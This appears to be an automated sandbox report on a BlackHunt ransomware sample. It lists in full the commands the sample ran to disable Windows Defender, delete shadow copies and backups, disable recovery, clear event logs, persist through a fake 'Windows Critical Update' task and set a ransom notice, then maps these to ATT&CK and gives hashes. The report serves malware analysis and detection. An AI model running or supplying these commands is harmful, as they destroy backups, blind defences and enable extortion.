f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 52 PID 1924 wrote to memory of 2712 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 52 PID 1924 wrote to memory of 1348 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 57 PID 1924 wrote to memory of 1348 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 57 PID 1924 wrote to memory of 1348 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 57 PID 1924 wrote to memory of 1348 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe"C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3024
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Adds Run key to start application
PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2344
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe" /F2⤵PID:940
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe" /F3⤵
- Creates scheduled task(s)
PID:804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1896
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1788
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1376
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:336
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:700
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1220
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1360
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2060
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1916
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2436
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1560
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1408
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2968
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1032
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3016
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2592
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2604
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2712
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2388
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:884
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1096
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2692
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1732
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2400
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:780
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2596
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:332
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1308
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2492
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1220
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2180
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe"2⤵
- Deletes itself
PID:2736 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2920
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2067384200-590457810-86622505335874607717151718431574141076-5308948221854417060"1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2104
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2828
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2216
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1440
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56086587658f49c3bd0264e0c52b6593e
SHA11eb93f29924f7e103ca4a0190adcbfe2c9590606
SHA2565252b252ca537d0c7e50882503b2337c3dfd9c81b5047d0034486c5fcb51ed13
SHA512bc3b234c4c437ab08ed915d9c201701dad1d599c2ca1beb0a5c665edce8492c52fade38d628f641889288f185d15e81d40e17f77f3f348657687d92a216c162d
-
Filesize
12KB
MD56d2c9f9737741cd8ce7b7125b030a7e6
SHA113eb8d9a12ea7a890d6b2f2a819776fcd2a705ff
SHA256d83f382f9c7005d23ad64a9721bb5995458d76c113b50607ae4d45610849dfc0
SHA5120a29c6415bad7350ec9e01eb726ae710632b1d9692c396cd1663dc8fdb1f8220ab1035ba5b4d0578b3bb3e2824bb4c6f9d9b3ca92fb546e78c5d947a94efeaf8
-
Filesize
684B
MD5fb0cd68a81ff45d35e603076f43cc882
SHA186985d0f2946cc1e84229e1dda87b21947cbf543
SHA256c822c5b8d9a22ddf5db31d6c89b3b7d18c56599ce18256dcaed5922cd4076765
SHA512acc8dbac8a349407f1191382788a79ca0f779301b80e354ec0ce0052d04e01dec11ed6ad23df4940ac06552e63f93763a6a5ce2ee7f656f73beef8f35dd11602